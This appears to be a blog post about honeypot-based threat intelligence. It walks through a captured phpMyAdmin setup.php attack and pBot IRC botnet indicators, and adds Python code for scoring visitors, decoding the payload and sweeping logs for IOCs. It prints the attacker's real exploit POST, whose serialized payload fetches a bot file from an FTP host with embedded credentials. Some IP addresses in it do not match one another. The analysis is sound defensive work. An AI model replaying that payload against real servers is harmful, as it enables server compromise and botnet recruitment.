Realizing your thirst for intel
Sitting in the trenches of intrusion detection systems (IDS), you quickly learn the need for intel. You also thirst to know what the actors who are setting off the alerts are actually trying to do. This is where my love for my honeypots comes in.
Honeypots are useful because they reveal, unbeknownst to the actor, the tools a malicious actor is using and help to determine their activities. From there, the honeypots feed the research aimed at identifying the actor's intentions. None of that happens until you dig into what your honeypots are telling you. Like logs, honeypots tell you a number of things.
So, what are honeypots really?
First, let's understand what most honeypots are. Most honeypots are merely systems connected to the Internet, minding their own business, doing nothing but listening, and definitely not attracting attention. They would prefer not to be bothered (don't we all know that feeling?). However, when they're touched they come to life and tell you everything, all the dirty little secrets they have to share, something like what siblings do on a long car ride.
When your honeypots start talking, the first part of their rant is about threat intelligence. The threat intelligence begins as "an IP address" connecting to a system it has no reason to connect to. (Is this actor a bad actor, or just someone wanting a map of the Internet?) In my opinion, if you touch something that you have no reason to touch, you're going to get some sort of threat score. From this, I have a record of you for later use.
The next part of the discussion, now that the actor knows there's a system listening on X number of ports, is whether they move on to the next address. If so, I give them a low threat score and note them as "seen as a scanner on this day." If they probe a little deeper, or skip the discovery of the base system and go straight for something more, the score starts to climb rapidly.
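The scoring idea above, worked through in code. This is an added example and not code from the original post: the honeypot events are constructed, and the weights (TOUCH, APP_REQUEST, TARGETED_PATH, STATE_CHANGE) and the score_sources function are my assumptions, since the article gives the ordering of scores, not the numbers.

```python
"""Score honeypot visitors by how far past a bare touch they go.  Added
example, not from the post; events are constructed and the weights are
assumptions (the article gives the ordering, not the numbers)."""
from collections import defaultdict

# Constructed honeypot events: (source_ip, dest_port, request_line_or_None).
EVENTS = [
    ("203.0.113.10", 22, None),                 # touched two ports, sent nothing
    ("203.0.113.10", 80, None),
    ("203.0.113.20", 80, "GET / HTTP/1.1"),     # discovery, then a targeted probe
    ("203.0.113.20", 80, "GET /phpmyadmin/scripts/setup.php HTTP/1.1"),
    ("203.0.113.20", 80, "POST /phpMyAdmin/scripts/setup.php HTTP/1.1"),
    ("203.0.113.30", 80, "GET /phpmyadmin/scripts/setup.php HTTP/1.1"),  # skipped discovery
]

# Assumed weights: one point for touching at all, more for each step deeper.
TOUCH, APP_REQUEST, TARGETED_PATH, STATE_CHANGE = 1, 3, 10, 15
# Paths nobody has a legitimate reason to ask a stranger's box for.
TARGETED_MARKERS = ("phpmyadmin", "setup.php")


def score_sources(events):
    """Return {source_ip: (score, [labels])}.  A bare touch is a 'scanner';
    application-layer requests, known-bad paths and POSTs climb fast."""
    scores = defaultdict(int)
    labels = defaultdict(set)
    for src, _port, request in events:
        scores.setdefault(src, 0)       # register the source even if it only touched a port
        if request is None:
            continue
        method, path, _ = request.split(" ", 2)
        scores[src] += APP_REQUEST
        if any(marker in path.lower() for marker in TARGETED_MARKERS):
            scores[src] += TARGETED_PATH
            labels[src].add("targeted probe")
        if method in ("POST", "PUT"):   # trying to change state, not just look
            scores[src] += STATE_CHANGE
            labels[src].add("exploit attempt")
    return {
        src: (TOUCH + total, sorted(labels[src]) or ["scanner"])
        for src, total in scores.items()
    }


if __name__ == "__main__":
    for src, (score, why) in sorted(score_sources(EVENTS).items()):
        print(f"{src:15} score={score:3}  {', '.join(why)}")
```

The source that swept two ports and left ends with the base score and the "scanner" label; the one that skipped discovery and went straight for setup.php outscores it at once, and the one that followed up with a POST climbs further still.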
Inspiration for this article
Let’s take a look at this morning’s events that inspired me to write this article.
Whoever/whatever, with a public address of 126.96.36.199, connected to one of my honeypots and was looking to see if I had left phpMyAdmin unsecured and open to the Internet:
    GET /phpmyadmin/scripts/setup.php HTTP/1.1
    Connection: Keep-Alive, TE
    Host: <my.honeypot.address.here>
    Keep-Alive: 300
    Te: deflate,gzip;q=0.3
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
My honeypot replied, telling them "Yes, I have that file," and sent the actor what they thought was the setup.php file. The actor then responded with a POST to the file:
    POST /phpMyAdmin/scripts/setup.php HTTP/1.1
    Connection: TE
    Content-Length: 225
    Content-Type: application/x-www-form-urlencoded
    Host: <my.honeypot.address.here>
    Referer: http://<my.honeypot.address.here>/phpMyAdmin/scripts/setup.php
    Te: deflate,gzip;q=0.3
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]

    action=lay_navigation&eoltype=unix&token=&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A46%3A%22ftp%3A%2F%2Fululi1%3A123456%4062%2E75%2E143%2E248%2Fhttpdocs%2Fbot%22%3B%7D%7D
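The POST body above is a percent-encoded, PHP-serialized object, and the IOCs are buried inside it. As an added example (not code from the original post), the Python below decodes the body and walks the configuration parameter with a minimal unserializer, so the FTP host, credentials and file name come out as structured fields rather than something you squint out of the encoding. The body string is reproduced from the request above with the line-wrap spaces removed; the php_unserialize, PhpObject and extract_iocs names are mine.

```python
"""Decode the honeypot's captured phpMyAdmin setup.php POST and pull IOCs out of
the PHP-serialized `configuration` parameter.  Added example, not from the post."""
from urllib.parse import parse_qs, urlsplit

# Request body as captured above (extraction line-wrap spaces removed).
CAPTURED_BODY = (
    "action=lay_navigation&eoltype=unix&token=&configuration="
    "a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3B"
    "s%3A46%3A%22ftp%3A%2F%2Fululi1%3A123456%4062%2E75%2E143%2E248%2Fhttpdocs%2Fbot%22%3B%7D%7D"
)


class PhpObject(dict):
    """A PHP object: its properties as a dict, plus the class name."""

    def __init__(self, class_name, props):
        super().__init__(props)
        self.class_name = class_name


def php_unserialize(data, pos=0):
    """Minimal PHP unserialize() covering N, i, b, s, a and O.

    Returns (value, next_pos).  Strings are read by their declared length, so a
    quote or semicolon inside a value cannot throw the parser off."""
    tag = data[pos]
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag in ("i", "b"):                            # i:42;   b:1;
        end = data.index(";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == "b" else num), end + 1
    if tag == "s":                                   # s:LEN:"bytes";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if tag == "a":                                   # a:COUNT:{key;value...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                              # skip :{
        items = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            items[key], pos = php_unserialize(data, pos)
        return items, pos + 1                        # skip }
    if tag == "O":                                   # O:LEN:"Class":COUNT:{props}
        colon = data.index(":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len]
        pos = colon + 2 + name_len + 2               # skip ":
        colon = data.index(":", pos)
        count = int(data[pos:colon])
        pos = colon + 2                              # skip :{
        props = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            props[key], pos = php_unserialize(data, pos)
        return PhpObject(name, props), pos + 1       # skip }
    raise ValueError(f"unsupported PHP type {tag!r} at offset {pos}")


def extract_iocs(body):
    """Return the actionable IOCs from the form body: where the exploit file is
    fetched from, with what credentials, and what it is called."""
    params = parse_qs(body, keep_blank_values=True)
    config, _ = php_unserialize(params["configuration"][0])
    pma = config[0]                                  # the injected PMA_Config object
    src = urlsplit(pma["source"])
    return {
        "injected_class": pma.class_name,
        "source_url": pma["source"],
        "scheme": src.scheme,
        "host": src.hostname,
        "port": src.port or 21,                      # FTP default when none is given
        "username": src.username,
        "password": src.password,
        "path": src.path,
        "filename": src.path.rsplit("/", 1)[-1],
    }


if __name__ == "__main__":
    for key, value in extract_iocs(CAPTURED_BODY).items():
        print(f"{key:15} {value}")
```

Reading strings by their declared length matters: the FTP URL contains colons, slashes and an @, so splitting on delimiters would mangle it, and the length prefix is exactly what PHP itself trusts when it unserializes. The decoded `source` is the IOC to watch for on the wire, and the embedded FTP username and password are worth recording too, since the same drop account tends to be reused across a campaign.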
Taking a look at threat intelligence and an IOC
From here we have threat intelligence and indicators of compromise (IOCs). The threat intel we have is that the actor 188.8.131.52 is a vulnerability/exploit scanner looking to exploit phpMyAdmin. We also have the threat intel that 184.108.40.206 is hosting the file the actor is trying to use to exploit phpMyAdmin.
The first IOC we see here is that 220.127.116.11 is hosting the needed exploit file over FTP. We can use this information to monitor our firewall logs for FTP connections to this address. Is there more? Yes, there is.
We can now look deeper at the bot script. Looking into it more closely, we find: an IP address and port for connecting, the IRC commands used with that address, and reports of geographical IP information from freegeoip.net along with system information. The script also shows that the host will primarily be used as a node in UDP and TCP flood attacks.
The newly discovered address can now be added to our threat intel as a malicious IRC server, and the IP address and port pair becomes an IOC. The script also tells us that another IOC to add is a higher-than-usual amount of UDP/TCP traffic from a host on our network(s). Finally, the pBot service/program itself can be used as an IOC.
We now have further threat intel on the following addresses:
- 18.104.22.168 == vulnerability/exploit scanner.
- 22.214.171.124 == hosts malicious files.
- 126.96.36.199 == malicious IRC server and/or Command and Control server.
We have the following indicators of compromise:
- FTP traffic to 188.8.131.52
- Traffic to 184.108.40.206 port 3303
- Downloading of a file named bot
- The running service/program of pBot
- Higher than normal UDP/TCP traffic from an internal host
- DNS queries for freegeoip.net
What's the value here?
This information can now be used to search our past and future logs, to create firewall rules that alert on or block the traffic, and to correlate with other events, past and future.
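To show what that search looks like in practice, here is an added example (not code from the original post) that sweeps log lines for the IOC list above. The indicator values are copied from the list; the firewall, DNS and process log lines are constructed, their `kind k=v` format is my own, and the FLOOD_THRESHOLD, parse, sweep and triage names are assumptions for the example.

```python
"""Sweep log lines for the IOCs listed above.  Added example, not from the
post; indicator values come from the IOC list, the log lines are constructed,
and the flood threshold is an assumption."""
import re
from collections import Counter, defaultdict

# Indicator values from the IOC list in the article.
FTP_HOST = "188.8.131.52"
IRC_HOST, IRC_PORT = "184.108.40.206", 3303
GEOIP_DOMAIN = "freegeoip.net"
BOT_FILENAME = "bot"
BOT_PROCESS = "pbot"
FLOOD_THRESHOLD = 50          # assumed: UDP/TCP packets from one host per log window

# Constructed sample lines (firewall, DNS resolver, process audit); not real captures.
SAMPLE_LOGS = [
    "fw src=10.0.0.5 dst=188.8.131.52 proto=tcp dport=21 action=allow",
    "fw src=10.0.0.5 dst=184.108.40.206 proto=tcp dport=3303 action=allow",
    "dns client=10.0.0.5 query=freegeoip.net. type=A",
    'proc host=10.0.0.5 comm=pbot cmd="perl /tmp/bot"',
    "fw src=10.0.0.7 dst=192.0.2.80 proto=tcp dport=443 action=allow",
    "dns client=10.0.0.7 query=example.org type=A",
] + [
    # the flood: 60 outbound UDP packets from the same host in one window
    f"fw src=10.0.0.5 dst=198.51.100.{i % 20} proto=udp dport=80 action=allow"
    for i in range(60)
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line):
    """'kind k=v k="v v"' -> dict of fields, with the record type under 'kind'."""
    kind, _, rest = line.strip().partition(" ")
    fields = {k: v.strip('"') for k, v in KV.findall(rest)}
    fields["kind"] = kind
    return fields


def sweep(lines):
    """Return a list of (internal_host, indicator_name, evidence) for every IOC hit."""
    hits = []
    volume = Counter()
    for raw in lines:
        if not raw.strip():
            continue
        ev = parse(raw)
        if ev["kind"] == "fw":
            src, dst, dport = ev["src"], ev["dst"], int(ev["dport"])
            if dst == FTP_HOST and dport == 21:
                hits.append((src, "ftp_to_dropper_host", raw))
            if dst == IRC_HOST and dport == IRC_PORT:
                hits.append((src, "irc_c2_connection", raw))
            if ev["proto"] in ("udp", "tcp"):
                volume[src] += 1
        elif ev["kind"] == "dns":
            if ev["query"].lower().rstrip(".") == GEOIP_DOMAIN:
                hits.append((ev["client"], "geoip_lookup", raw))
        elif ev["kind"] == "proc":
            # match on the process name or on the script file handed to the interpreter
            script = ev.get("cmd", "").split(" ")[-1].rsplit("/", 1)[-1]
            if ev.get("comm") == BOT_PROCESS or script == BOT_FILENAME:
                hits.append((ev["host"], "pbot_process", raw))
    # the volume indicator is judged after the pass, per source host
    for src, count in volume.items():
        if count >= FLOOD_THRESHOLD:
            hits.append((src, "flood_volume", f"{count} packets in window"))
    return hits


def triage(lines):
    """Group hits by internal host; a host with several distinct indicators
    deserves an incident, not just an alert."""
    by_host = defaultdict(set)
    for host, name, _ in sweep(lines):
        by_host[host].add(name)
    return {host: sorted(names) for host, names in by_host.items()}


if __name__ == "__main__":
    for host, names in triage(SAMPLE_LOGS).items():
        print(host, "->", ", ".join(names))
```

The point of grouping by internal host is correlation: an FTP pull from the dropper host, a connection to the IRC port, a freegeoip.net lookup and a pbot process on the same box tell a story that no single indicator does. The volume check is deliberately crude; in production you would baseline per host rather than use one fixed number.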